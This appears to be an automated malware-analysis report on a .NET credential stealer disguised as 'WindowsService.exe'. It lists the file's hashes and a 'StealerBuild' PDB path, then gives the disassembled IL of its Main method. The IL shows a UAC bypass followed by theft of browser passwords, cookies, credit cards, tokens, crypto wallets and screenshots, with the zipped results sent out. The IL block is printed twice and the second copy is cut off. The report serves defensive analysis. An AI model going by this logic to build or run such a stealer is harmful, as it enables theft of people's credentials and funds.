4d049fe26c4367adfbe5b6c4d2d031cf
PE Executable | MD5: 4d049fe26c4367adfbe5b6c4d2d031cf | Size: 2.61 MB | application/x-dosexec
Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 4d049fe26c4367adfbe5b6c4d2d031cf
|
| Sha1 | 79af2c9bb81d9699a6948cc265d553bd5e1482bd
|
| Sha256 | ed6963178802d34baee6184ac0bc08cd8bec179d35e7a1da21ef09a7623029f7
|
| Sha384 | bf2b64aa7cd2e4bf1f24e00dbef0b252c41b349b095181cee3a9d74839161526f62956044e4b0c85e0fbf4aee2df5390
|
| Sha512 | be70fc61c8e455d359b1a6dfd8dc5b76c3cb20b0372cf39df728e5566944c46d988ae45fb8251c900ea06594897985b8a8df9cf0403cc0e49bb1903e8a7f79df
|
| SSDeep | 49152:eLvL+2upjBVhbAbXMtQl/wLz8r5S5l7KdVSZ4eY83TAcm:AL+2upjBVGVl/lQrCSZ4183Dm
|
| TLSH | 33C523853BFC4948F6BF9F702DB626248579B8A25D21EB5E06C1309C1931FD5ADA0F23
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | PDB Path: C:\Users\Administrator\AppData\Local\Temp\2\StealerBuild_mbw1g6ks\obj\Release\WindowsService.pdb |
| Module Name | WindowsService.exe |
| Full Name | WindowsService.exe |
| EntryPoint | System.Void chrome_v20_decryption_CSharp.Program::Main(System.String[]) |
| Scope Name | WindowsService.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | WindowsService |
| Assembly Version | 131.0.6778.140 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.8 |
| Total Strings | 1126 |
| Main Method | System.Void chrome_v20_decryption_CSharp.Program::Main(System.String[]) |
| Main IL Instruction Count | 451 |
| Main IL | call System.AppDomain System.AppDomain::get_CurrentDomain() ldsfld System.UnhandledExceptionEventHandler chrome_v20_decryption_CSharp.Program/<>c::<>9__26_0 dup <null> brtrue.s IL_0024: callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler) pop <null> ldsfld chrome_v20_decryption_CSharp.Program/<>c chrome_v20_decryption_CSharp.Program/<>c::<>9 ldftn System.Void chrome_v20_decryption_CSharp.Program/<>c::<Main>b__26_0(System.Object,System.UnhandledExceptionEventArgs) newobj System.Void System.UnhandledExceptionEventHandler::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.UnhandledExceptionEventHandler chrome_v20_decryption_CSharp.Program/<>c::<>9__26_0 callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler) call System.Int32 chrome_v20_decryption_CSharp.Program::CheckSeenBefore() stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_seenBeforeCount call System.Boolean chrome_v20_decryption_CSharp.Program::FreeConsole() pop <null> leave.s IL_003E: nop pop <null> leave.s IL_003E: nop nop <null> ldc.i4 4032 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) leave.s IL_004E: nop pop <null> leave.s IL_004E: nop nop <null> call System.Boolean chrome_v20_decryption_CSharp.Program::IsLicenseValid() brtrue.s IL_005B: leave.s IL_0063 leave IL_0475: ret leave.s IL_0063: nop pop <null> leave IL_0475: ret nop <null> call System.Void chrome_v20_decryption_CSharp.Program::SendPhoneHome() leave.s IL_006E: ldc.i4.0 pop <null> leave.s IL_006E: ldc.i4.0 ldc.i4.0 <null> stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> ldc.i4.0 <null> stloc.3 <null> ldc.i4.0 <null> stloc.s V_4 ldarg.0 <null> ldlen <null> brtrue.s IL_008D: ldc.i4.0 ldc.i4.1 <null> stloc.0 <null> ldc.i4.1 <null> stloc.1 <null> ldc.i4.1 <null> stloc.2 <null> ldc.i4.1 <null> stloc.3 <null> ldc.i4.1 <null> stloc.s V_4 br IL_0223: ldloc.0 ldc.i4.0 <null> stloc.s V_11 br IL_0219: ldloc.s V_11 ldarg.0 <null> ldloc.s V_11 ldelem.ref <null> callvirt System.String System.String::ToLower() stloc.s V_12 ldloc.s V_12 brfalse IL_0213: ldloc.s V_11 ldloc.s V_12 call System.Int32 System.String::get_Length() stloc.s V_13 ldloc.s V_13 ldc.i4.2 <null> beq.s IL_00E0: ldloc.s V_12 ldloc.s V_13 ldc.i4.3 <null> beq IL_01E0: ldloc.s V_12 ldloc.s V_13 ldc.i4.s 9 sub <null> switch dnlib.DotNet.Emit.Instruction[] br IL_0213: ldloc.s V_11 ldloc.s V_12 ldc.i4.1 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 100 bgt.un.s IL_0104: ldloc.s V_14 ldloc.s V_14 ldc.i4.s 99 beq.s IL_0167: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 100 beq IL_0190: ldloc.s V_12 br IL_0213: ldloc.s V_11 ldloc.s V_14 ldc.i4.s 104 beq.s IL_017D: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 112 beq.s IL_0151: ldloc.s V_12 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldc.i4.2 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 100 beq IL_01B0: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 112 beq.s IL_01A0: ldloc.s V_12 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldc.i4.2 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 99 beq.s IL_01C0: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 104 beq IL_01D0: ldloc.s V_12 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr -p call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_0200: ldc.i4.1 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr -c call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_0204: ldc.i4.1 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr -h call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0208: ldc.i4.1 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr -d call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_020C: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr --passwords call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0200: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr --downloads call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_020C: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr --cookies call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0204: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr --history call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0208: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr -cc call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0210: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr --creditcards call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0210: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldc.i4.1 <null> stloc.0 <null> br.s IL_0213: ldloc.s V_11 ldc.i4.1 <null> stloc.1 <null> br.s IL_0213: ldloc.s V_11 ldc.i4.1 <null> stloc.2 <null> br.s IL_0213: ldloc.s V_11 ldc.i4.1 <null> stloc.3 <null> br.s IL_0213: ldloc.s V_11 ldc.i4.1 <null> stloc.s V_4 ldloc.s V_11 ldc.i4.1 <null> add <null> stloc.s V_11 ldloc.s V_11 ldarg.0 <null> ldlen <null> conv.i4 <null> blt IL_0095: ldarg.0 ldloc.0 <null> ldloc.1 <null> or <null> ldloc.s V_4 or <null> brfalse.s IL_0245: newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() call System.Boolean chrome_v20_decryption_CSharp.Program::IsAdmin() brtrue.s IL_0245: newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() call System.Boolean chrome_v20_decryption_CSharp.Program/UACBypass::BypassUAC() brfalse.s IL_023E: ldc.i4.0 leave IL_0475: ret ldc.i4.0 <null> stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldc.i4.0 <null> stloc.s V_4 newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() stloc.s V_5 ldnull <null> stloc.s V_6 ldnull <null> stloc.s V_7 ldnull <null> stloc.s V_8 ldnull <null> stloc.s V_9 ldnull <null> stloc.s V_10 ldloc.0 <null> brfalse.s IL_0267: leave.s IL_026C ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Login>> chrome_v20_decryption_CSharp.Chromium::GetLoginDataByBrowser() stloc.s V_6 leave.s IL_026C: nop pop <null> leave.s IL_026C: nop nop <null> ldloc.1 <null> brfalse.s IL_0279: leave.s IL_027E ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Cookie>> chrome_v20_decryption_CSharp.Chromium::GetCookiesByBrowser() stloc.s V_7 leave.s IL_027E: nop pop <null> leave.s IL_027E: nop nop <null> ldloc.2 <null> brfalse.s IL_028B: leave.s IL_0290 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/WebHistory>> chrome_v20_decryption_CSharp.Chromium::GetWebHistoryByBrowser() stloc.s V_8 leave.s IL_0290: nop pop <null> leave.s IL_0290: nop nop <null> ldloc.3 <null> brfalse.s IL_029D: leave.s IL_02A2 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Download>> chrome_v20_decryption_CSharp.Chromium::GetDownloadsByBrowser() stloc.s V_9 leave.s IL_02A2: nop pop <null> leave.s IL_02A2: nop nop <null> ldloc.s V_4 brfalse.s IL_02B0: leave.s IL_02B5 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/CreditCard>> chrome_v20_decryption_CSharp.Chromium::GetCreditCardsByBrowser() stloc.s V_10 leave.s IL_02B5: nop pop <null> leave.s IL_02B5: nop nop <null> ldloc.0 <null> brfalse.s IL_02C0: leave.s IL_02C5 ldloc.s V_6 call System.Void chrome_v20_decryption_CSharp.Program::WriteLogins(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Login>>) leave.s IL_02C5: nop pop <null> leave.s IL_02C5: nop nop <null> ldloc.1 <null> brfalse.s IL_02D0: leave.s IL_02D5 ldloc.s V_7 call System.Void chrome_v20_decryption_CSharp.Program::WriteCookies(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Cookie>>) leave.s IL_02D5: nop pop <null> leave.s IL_02D5: nop nop <null> ldloc.2 <null> brfalse.s IL_02E0: leave.s IL_02E5 ldloc.s V_8 call System.Void chrome_v20_decryption_CSharp.Program::WriteHistory(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/WebHistory>>) leave.s IL_02E5: nop pop <null> leave.s IL_02E5: nop nop <null> ldloc.3 <null> brfalse.s IL_02F0: leave.s IL_02F5 ldloc.s V_9 call System.Void chrome_v20_decryption_CSharp.Program::WriteDownloads(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Download>>) leave.s IL_02F5: nop pop <null> leave.s IL_02F5: nop nop <null> ldloc.s V_4 brfalse.s IL_0301: leave.s IL_0306 ldloc.s V_10 call System.Void chrome_v20_decryption_CSharp.Program::WriteCreditCards(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/CreditCard>>) leave.s IL_0306: nop pop <null> leave.s IL_0306: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::GatherSystemInfo() leave.s IL_0311: nop pop <null> leave.s IL_0311: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ExtractTokens() leave.s IL_031C: nop pop <null> leave.s IL_031C: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ExtractPasswordManagers() leave.s IL_0327: nop pop <null> leave.s IL_0327: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ScanFileSystem() leave.s IL_0332: nop pop <null> leave.s IL_0332: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::CaptureScreenshot() leave.s IL_033D: nop pop <null> leave.s IL_033D: nop nop <null> call System.Void chrome_v20_decryption_CSharp.CryptoWallets::GrabCryptoWallets() call System.String chrome_v20_decryption_CSharp.Program::GetWalletsDirectory() stloc.s V_15 ldloc.s V_15 call System.Boolean System.IO.Directory::Exists(System.String) brfalse.s IL_0369: leave.s IL_036E ldloc.s V_15 ldstr * ldc.i4.1 <null> call System.String[] System.IO.Directory::GetFiles(System.String,System.String,System.IO.SearchOption) ldlen <null> brfalse.s IL_0369: leave.s IL_036E ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasWallets leave.s IL_036E: nop pop <null> leave.s IL_036E: nop nop <null> call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxLogin> chrome_v20_decryption_CSharp.Firefox::GetLogins() callvirt System.Int32 System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxLogin>::get_Count() stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ble.s IL_0393: call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie> chrome_v20_decryption_CSharp.Firefox::GetCookies() ldsfld System.Int32 chrome_v20_decryption_CSharp.Program::_passwordCount ldloc.s V_16 add <null> stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_passwordCount ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasFirefox call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie> chrome_v20_decryption_CSharp.Firefox::GetCookies() callvirt System.Int32 System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie>::get_Count() stloc.s V_17 ldloc.s V_17 ldc.i4.0 <null> ble.s IL_03B7: call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() ldsfld System.Int32 chrome_v20_decryption_CSharp.Program::_cookieCount ldloc.s V_17 add <null> stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_cookieCount ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasFirefox call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() call System.Void chrome_v20_decryption_CSharp.Firefox::WriteFirefoxData(System.String) call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() call System.Void chrome_v20_decryption_CSharp.Firefox::CopyFirefoxProfiles(System.String) leave.s IL_03D0: nop pop <null> leave.s IL_03D0: nop nop <null> call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() stloc.s V_18 ldloc.s V_18 call System.Boolean System.IO.Directory::Exists(System.String) brfalse.s IL_0440: leave.s IL_044A ldc.i4 500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.s V_18 call System.String chrome_v20_decryption_CSharp.Program::ZipFolder(System.String) stloc.s V_19 ldloc.s V_19 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0432: nop ldloc.s V_19 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0432: nop ldloc.s V_19 newobj System.Void System.IO.FileInfo::.ctor(System.String) ldc.i4 50331648 conv.i8 <null> stloc.s V_20 callvirt System.Int64 System.IO.FileInfo::get_Length() ldloc.s V_20 pop <null> pop <null> ldloc.s V_19 call System.Void chrome_v20_decryption_CSharp.Program::SendData(System.String) nop <null> ldloc.s V_19 call System.Void System.IO.File::Delete(System.String) leave.s IL_0432: nop pop <null> leave.s IL_0432: nop nop <null> ldloc.s V_18 ldc.i4.1 <null> call System.Void System.IO.Directory::Delete(System.String,System.Boolean) leave.s IL_0440: leave.s IL_044A pop <null> leave.s IL_0440: leave.s IL_044A leave.s IL_044A: nop callvirt System.Exception System.Exception::get_InnerException() pop <null> leave.s IL_044A: nop nop <null> ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) leave.s IL_045A: leave.s IL_0475 pop <null> leave.s IL_045A: leave.s IL_0475 leave.s IL_0475: ret pop <null> leave.s IL_0475: ret nop <null> call System.Void System.GC::Collect() call System.Void System.GC::WaitForPendingFinalizers() call System.Void System.GC::Collect() leave.s IL_0474: endfinally pop <null> leave.s IL_0474: endfinally endfinally <null> ret <null> |
| Module Name | WindowsService.exe |
| Full Name | WindowsService.exe |
| EntryPoint | System.Void chrome_v20_decryption_CSharp.Program::Main(System.String[]) |
| Scope Name | WindowsService.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | WindowsService |
| Assembly Version | 131.0.6778.140 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.8 |
| Total Strings | 1126 |
| Main Method | System.Void chrome_v20_decryption_CSharp.Program::Main(System.String[]) |
| Main IL Instruction Count | 451 |
| Main IL | call System.AppDomain System.AppDomain::get_CurrentDomain() ldsfld System.UnhandledExceptionEventHandler chrome_v20_decryption_CSharp.Program/<>c::<>9__26_0 dup <null> brtrue.s IL_0024: callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler) pop <null> ldsfld chrome_v20_decryption_CSharp.Program/<>c chrome_v20_decryption_CSharp.Program/<>c::<>9 ldftn System.Void chrome_v20_decryption_CSharp.Program/<>c::<Main>b__26_0(System.Object,System.UnhandledExceptionEventArgs) newobj System.Void System.UnhandledExceptionEventHandler::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.UnhandledExceptionEventHandler chrome_v20_decryption_CSharp.Program/<>c::<>9__26_0 callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler) call System.Int32 chrome_v20_decryption_CSharp.Program::CheckSeenBefore() stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_seenBeforeCount call System.Boolean chrome_v20_decryption_CSharp.Program::FreeConsole() pop <null> leave.s IL_003E: nop pop <null> leave.s IL_003E: nop nop <null> ldc.i4 4032 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) leave.s IL_004E: nop pop <null> leave.s IL_004E: nop nop <null> call System.Boolean chrome_v20_decryption_CSharp.Program::IsLicenseValid() brtrue.s IL_005B: leave.s IL_0063 leave IL_0475: ret leave.s IL_0063: nop pop <null> leave IL_0475: ret nop <null> call System.Void chrome_v20_decryption_CSharp.Program::SendPhoneHome() leave.s IL_006E: ldc.i4.0 pop <null> leave.s IL_006E: ldc.i4.0 ldc.i4.0 <null> stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> ldc.i4.0 <null> stloc.3 <null> ldc.i4.0 <null> stloc.s V_4 ldarg.0 <null> ldlen <null> brtrue.s IL_008D: ldc.i4.0 ldc.i4.1 <null> stloc.0 <null> ldc.i4.1 <null> stloc.1 <null> ldc.i4.1 <null> stloc.2 <null> ldc.i4.1 <null> stloc.3 <null> ldc.i4.1 <null> stloc.s V_4 br IL_0223: ldloc.0 ldc.i4.0 <null> stloc.s V_11 br IL_0219: ldloc.s V_11 ldarg.0 <null> ldloc.s V_11 ldelem.ref <null> callvirt System.String System.String::ToLower() stloc.s V_12 ldloc.s V_12 brfalse IL_0213: ldloc.s V_11 ldloc.s V_12 call System.Int32 System.String::get_Length() stloc.s V_13 ldloc.s V_13 ldc.i4.2 <null> beq.s IL_00E0: ldloc.s V_12 ldloc.s V_13 ldc.i4.3 <null> beq IL_01E0: ldloc.s V_12 ldloc.s V_13 ldc.i4.s 9 sub <null> switch dnlib.DotNet.Emit.Instruction[] br IL_0213: ldloc.s V_11 ldloc.s V_12 ldc.i4.1 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 100 bgt.un.s IL_0104: ldloc.s V_14 ldloc.s V_14 ldc.i4.s 99 beq.s IL_0167: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 100 beq IL_0190: ldloc.s V_12 br IL_0213: ldloc.s V_11 ldloc.s V_14 ldc.i4.s 104 beq.s IL_017D: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 112 beq.s IL_0151: ldloc.s V_12 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldc.i4.2 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 100 beq IL_01B0: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 112 beq.s IL_01A0: ldloc.s V_12 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldc.i4.2 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 99 beq.s IL_01C0: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 104 beq IL_01D0: ldloc.s V_12 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr -p call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_0200: ldc.i4.1 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr -c call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_0204: ldc.i4.1 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr -h call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0208: ldc.i4.1 br IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr -d call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_020C: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr --passwords call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0200: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr --downloads call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_020C: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr --cookies call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0204: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr --history call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0208: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr -cc call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0210: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldloc.s V_12 ldstr --creditcards call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0210: ldc.i4.1 br.s IL_0213: ldloc.s V_11 ldc.i4.1 <null> stloc.0 <null> br.s IL_0213: ldloc.s V_11 ldc.i4.1 <null> stloc.1 <null> br.s IL_0213: ldloc.s V_11 ldc.i4.1 <null> stloc.2 <null> br.s IL_0213: ldloc.s V_11 ldc.i4.1 <null> stloc.3 <null> br.s IL_0213: ldloc.s V_11 ldc.i4.1 <null> stloc.s V_4 ldloc.s V_11 ldc.i4.1 <null> add <null> stloc.s V_11 ldloc.s V_11 ldarg.0 <null> ldlen <null> conv.i4 <null> blt IL_0095: ldarg.0 ldloc.0 <null> ldloc.1 <null> or <null> ldloc.s V_4 or <null> brfalse.s IL_0245: newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() call System.Boolean chrome_v20_decryption_CSharp.Program::IsAdmin() brtrue.s IL_0245: newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() call System.Boolean chrome_v20_decryption_CSharp.Program/UACBypass::BypassUAC() brfalse.s IL_023E: ldc.i4.0 leave IL_0475: ret ldc.i4.0 <null> stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldc.i4.0 <null> stloc.s V_4 newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() stloc.s V_5 ldnull <null> stloc.s V_6 ldnull <null> stloc.s V_7 ldnull <null> stloc.s V_8 ldnull <null> stloc.s V_9 ldnull <null> stloc.s V_10 ldloc.0 <null> brfalse.s IL_0267: leave.s IL_026C ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Login>> chrome_v20_decryption_CSharp.Chromium::GetLoginDataByBrowser() stloc.s V_6 leave.s IL_026C: nop pop <null> leave.s IL_026C: nop nop <null> ldloc.1 <null> brfalse.s IL_0279: leave.s IL_027E ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Cookie>> chrome_v20_decryption_CSharp.Chromium::GetCookiesByBrowser() stloc.s V_7 leave.s IL_027E: nop pop <null> leave.s IL_027E: nop nop <null> ldloc.2 <null> brfalse.s IL_028B: leave.s IL_0290 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/WebHistory>> chrome_v20_decryption_CSharp.Chromium::GetWebHistoryByBrowser() stloc.s V_8 leave.s IL_0290: nop pop <null> leave.s IL_0290: nop nop <null> ldloc.3 <null> brfalse.s IL_029D: leave.s IL_02A2 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Download>> chrome_v20_decryption_CSharp.Chromium::GetDownloadsByBrowser() stloc.s V_9 leave.s IL_02A2: nop pop <null> leave.s IL_02A2: nop nop <null> ldloc.s V_4 brfalse.s IL_02B0: leave.s IL_02B5 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/CreditCard>> chrome_v20_decryption_CSharp.Chromium::GetCreditCardsByBrowser() stloc.s V_10 leave.s IL_02B5: nop pop <null> leave.s IL_02B5: nop nop <null> ldloc.0 <null> brfalse.s IL_02C0: leave.s IL_02C5 ldloc.s V_6 call System.Void chrome_v20_decryption_CSharp.Program::WriteLogins(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Login>>) leave.s IL_02C5: nop pop <null> leave.s IL_02C5: nop nop <null> ldloc.1 <null> brfalse.s IL_02D0: leave.s IL_02D5 ldloc.s V_7 call System.Void chrome_v20_decryption_CSharp.Program::WriteCookies(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Cookie>>) leave.s IL_02D5: nop pop <null> leave.s IL_02D5: nop nop <null> ldloc.2 <null> brfalse.s IL_02E0: leave.s IL_02E5 ldloc.s V_8 call System.Void chrome_v20_decryption_CSharp.Program::WriteHistory(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/WebHistory>>) leave.s IL_02E5: nop pop <null> leave.s IL_02E5: nop nop <null> ldloc.3 <null> brfalse.s IL_02F0: leave.s IL_02F5 ldloc.s V_9 call System.Void chrome_v20_decryption_CSharp.Program::WriteDownloads(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Download>>) leave.s IL_02F5: nop pop <null> leave.s IL_02F5: nop nop <null> ldloc.s V_4 brfalse.s IL_0301: leave.s IL_0306 ldloc.s V_10 call System.Void chrome_v20_decryption_CSharp.Program::WriteCreditCards(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/CreditCard>>) leave.s IL_0306: nop pop <null> leave.s IL_0306: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::GatherSystemInfo() leave.s IL_0311: nop pop <null> leave.s IL_0311: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ExtractTokens() leave.s IL_031C: nop pop <null> leave.s IL_031C: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ExtractPasswordManagers() leave.s IL_0327: nop pop <null> leave.s IL_0327: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ScanFileSystem() leave.s IL_0332: nop pop <null> leave.s IL_0332: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::CaptureScreenshot() leave.s IL_033D: nop pop <null> leave.s IL_033D: nop nop <null> call System.Void chrome_v20_decryption_CSharp.CryptoWallets::GrabCryptoWallets() call System.String chrome_v20_decryption_CSharp.Program::GetWalletsDirectory() stloc.s V_15 ldloc.s V_15 call System.Boolean System.IO.Directory::Exists(System.String) brfalse.s IL_0369: leave.s IL_036E ldloc.s V_15 ldstr * ldc.i4.1 <null> call System.String[] System.IO.Directory::GetFiles(System.String,System.String,System.IO.SearchOption) ldlen <null> brfalse.s IL_0369: leave.s IL_036E ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasWallets leave.s IL_036E: nop pop <null> leave.s IL_036E: nop nop <null> call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxLogin> 